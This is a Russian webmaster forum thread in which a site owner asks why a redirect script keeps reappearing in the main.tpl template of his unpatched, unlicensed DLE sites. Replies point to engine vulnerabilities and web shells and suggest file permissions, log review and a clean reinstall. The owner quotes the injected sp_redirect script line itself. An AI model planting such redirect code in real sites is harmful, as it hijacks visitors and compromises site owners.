- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Короче, какой-то сцука разместил внизу на нескольких моих сайтах на ДЛЕ:
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n-->
Снес эту хрень, на следующий день оно снова в строю :madd:
Снес, поменял пасс от фтп, пасс админа - на следующий день опять появилось. :madd:
Снес, поменял пасс админа, фтп, юзера базы, проверил все корень на наличие левого - нашел левую папку и пару левых файлов все снес к чертовой матери. Зараза опять появилась на след день. :madd:
Снес, поменял опять пасс админа, перенес на другой хост (со сменой пароля фтп и пользователя БД). Опять есть :madd::madd::madd:
Сайты так ничего из себя не представляют, тупо висят, но все же... Но блин, естественно, бесит...
Может кто сталкивался, и знает в чем дело.. Ну не ломают же их все спецом каждый день... Тем боле что все похоже на то, что делается это автоматом, т.к майн заменяется на корявый каждый раз, из-за чего у одного из сайтов лезет диз.
heialo, DLE лицензия? Какая версия? Проверяйте на шеллы
Конечно автоматом.
Вы хоть в космос сайт спрячьте. Вы вместе с ним переносите зараженные файлы
Попробуйте это для начала.
Скорей всего где-то есть дыра:)
Ваш КО
eis, ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5
Ну я хост поменял даже. Т.к грешил на него (все сайты что ломались были на нем). Но..
ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5
Вот и причина. ДЛЕ нелицензия + версия 8,3-8,5. И конечно же не ставились заплатки от уязвимостей?
Тут в 9.* дыр уже нашли под 2 мульона(я приврал), а Вы удивляетесь что 8.* хакнули:)
eis, ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5
Ну я хост поменял даже. Т.к грешил на него (все сайты что ломались были на нем). Но..
Дак хоста можно менять хоть 10 раз - вы файлы переносите все свои, которые заражены, и вирусы будут появляться хоть где. Как тут выше сказали - хоть в космос сайт унесите. Проверяйте файлы, например index.php (очень часто у зараженных сайтов в конце этого файла можно обнаружить левый код, который и генерирует вирус), но не факт, бывают и в других файлах.
Может кто сталкивался, и знает в чем дело..
Добро пожаловать /ru/forum/764551
http://www.google.ru/search?hl=ru&newwindow=1&safe=off&site=&source=hp&q=%D0%B2%D0%B8%D1%80%D1%83%D1%81+%D0%BD%D0%B0+%D1%81%D0%B0%D0%B9%D1%82%D0%B5+DLE+site:forum.searchengines.ru&oq=&gs_l=
А в каком файле дописывается скрипт? Поставьте права без права записи (только исполнение). Хотя это конечно не решение проблемы, но если вы даже ЦМС не обновляете, то думаю вам это решение в самый раз ))
main.tpl в самом низу в пределах бади.
пробовал скриптом который показал Милованов Ю.С, проверил по тем местам что скрипт считает что шелл есть - ничего там нету...
Пока поменял все что мог, посмотрю что завтра будет...
Поставьте для него права 444. (Хотя зачастую инфицируется много файлов) Я так понимаю ломают не фтп... А где-то гадость в самом движке. Так он не сможет именно в этот файл ничего записать и изменить...
И ещё гляньте по логам, какие файлы были изменены в дату взлома. Если лень искать в них каку, перезалейте с чистого движка.
Зачастую инфицируют Index.php и htaccess.